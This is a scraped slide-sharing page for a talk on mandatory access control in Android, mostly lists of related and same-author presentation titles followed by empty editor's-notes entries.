闘うITエンジニアのためのLinuxセキュリティ講座闘うITエンジニアのためのLinuxセキュリティ講座
闘うITエンジニアのためのLinuxセキュリティ講座
 
【Androidテスト部】AppLog問題をちゃんと理解し、対策を考える(冒頭解説資料)
【Androidテスト部】AppLog問題をちゃんと理解し、対策を考える(冒頭解説資料)【Androidテスト部】AppLog問題をちゃんと理解し、対策を考える(冒頭解説資料)
【Androidテスト部】AppLog問題をちゃんと理解し、対策を考える(冒頭解説資料)
 
[ABC2016S]Android Wear アプリ開発入門
[ABC2016S]Android Wear アプリ開発入門[ABC2016S]Android Wear アプリ開発入門
[ABC2016S]Android Wear アプリ開発入門
 
OSS脆弱性スキャナー開発を始めた件について
OSS脆弱性スキャナー開発を始めた件についてOSS脆弱性スキャナー開発を始めた件について
OSS脆弱性スキャナー開発を始めた件について
 
Java/Androidセキュアコーディング
Java/AndroidセキュアコーディングJava/Androidセキュアコーディング
Java/Androidセキュアコーディング
 

More from Hiromu Yakura

Human-AI communication for human-human communication / CHAI Workshop @ IJCAI ...
Human-AI communication for human-human communication / CHAI Workshop @ IJCAI ...Human-AI communication for human-human communication / CHAI Workshop @ IJCAI ...
Human-AI communication for human-human communication / CHAI Workshop @ IJCAI ...Hiromu Yakura
 
How to make good use of AI technologies? @ Tsukuba Conference 2021
How to make good use of AI technologies? @ Tsukuba Conference 2021How to make good use of AI technologies? @ Tsukuba Conference 2021
How to make good use of AI technologies? @ Tsukuba Conference 2021Hiromu Yakura
 
機械学習を"良く"使うには
機械学習を"良く"使うには機械学習を"良く"使うには
機械学習を"良く"使うにはHiromu Yakura
 
自己紹介@名状しがたいお茶会
自己紹介@名状しがたいお茶会自己紹介@名状しがたいお茶会
自己紹介@名状しがたいお茶会Hiromu Yakura
 
Python 3のWebシステムでDDDに入門してみた
Python 3のWebシステムでDDDに入門してみたPython 3のWebシステムでDDDに入門してみた
Python 3のWebシステムでDDDに入門してみたHiromu Yakura
 
Robust Audio Adversarial Example for a Physical Attack
Robust Audio Adversarial Example for a Physical AttackRobust Audio Adversarial Example for a Physical Attack
Robust Audio Adversarial Example for a Physical AttackHiromu Yakura
 
機械学習コン講評
機械学習コン講評機械学習コン講評
機械学習コン講評Hiromu Yakura
 
NPCA夏合宿 2014 講義資料
NPCA夏合宿 2014 講義資料NPCA夏合宿 2014 講義資料
NPCA夏合宿 2014 講義資料Hiromu Yakura
 
イタリアでパスタを食べた話
イタリアでパスタを食べた話イタリアでパスタを食べた話
イタリアでパスタを食べた話Hiromu Yakura
 

More from Hiromu Yakura (14)

Human-AI communication for human-human communication / CHAI Workshop @ IJCAI ...
Human-AI communication for human-human communication / CHAI Workshop @ IJCAI ...Human-AI communication for human-human communication / CHAI Workshop @ IJCAI ...
Human-AI communication for human-human communication / CHAI Workshop @ IJCAI ...
 
How to make good use of AI technologies? @ Tsukuba Conference 2021
How to make good use of AI technologies? @ Tsukuba Conference 2021How to make good use of AI technologies? @ Tsukuba Conference 2021
How to make good use of AI technologies? @ Tsukuba Conference 2021
 
機械学習を"良く"使うには
機械学習を"良く"使うには機械学習を"良く"使うには
機械学習を"良く"使うには
 
自己紹介@名状しがたいお茶会
自己紹介@名状しがたいお茶会自己紹介@名状しがたいお茶会
自己紹介@名状しがたいお茶会
 
Python 3のWebシステムでDDDに入門してみた
Python 3のWebシステムでDDDに入門してみたPython 3のWebシステムでDDDに入門してみた
Python 3のWebシステムでDDDに入門してみた
 
Robust Audio Adversarial Example for a Physical Attack
Robust Audio Adversarial Example for a Physical AttackRobust Audio Adversarial Example for a Physical Attack
Robust Audio Adversarial Example for a Physical Attack
 
機械学習コン講評
機械学習コン講評機械学習コン講評
機械学習コン講評
 
NPCA夏合宿 2014 講義資料
NPCA夏合宿 2014 講義資料NPCA夏合宿 2014 講義資料
NPCA夏合宿 2014 講義資料
 
イタリアでパスタを食べた話
イタリアでパスタを食べた話イタリアでパスタを食べた話
イタリアでパスタを食べた話
 
CTFとは
CTFとはCTFとは
CTFとは
 
ぃぬ速@LKML
ぃぬ速@LKMLぃぬ速@LKML
ぃぬ速@LKML
 
プラトン
プラトンプラトン
プラトン
 
How to lick Miku
How to lick MikuHow to lick Miku
How to lick Miku
 
ERASER
ERASERERASER
ERASER
 

Androidにおける強制アクセス制御

Editor's Notes

  1. \n
  2. \n
  3. \n
  4. \n
  5. \n
  6. \n
  7. \n
  8. \n
  9. \n
  10. \n
  11. \n
  12. \n
  13. \n
  14. \n
  15. \n
  16. \n
  17. \n
  18. \n
  19. \n
  20. \n
  21. \n
  22. \n
  23. \n
  24. \n
  25. \n
  26. \n
  27. \n
  28. \n
  29. \n
  30. \n
  31. \n
  32. \n
  33. \n
  34. \n
  35. \n
  36. \n
  37. \n
  38. \n
  39. \n
  40. \n
  41. \n
  42. \n
  43. \n
  44. \n
  45. \n
  46. \n
  47. \n
  48. \n
  49. \n
  50. \n
  51. \n
  52. \n
  53. \n
  54. \n
  55. \n
  56. \n
  57. \n
  58. \n
  59. \n
  60. \n
  61. \n
  62. \n
  63. \n
  64. \n
  65. \n
  66. \n
  67. \n
  68. \n
  69. \n
  70. \n
  71. \n
  72. \n
  73. \n
  74. \n
  75. \n
  76. \n
  77. \n
  78. \n
  79. \n
  80. \n
  81. \n
  82. \n
  83. \n
  84. \n
  85. \n
  86. \n
  87. \n
  88. \n
  89. \n
  90. \n
  91. \n
  92. \n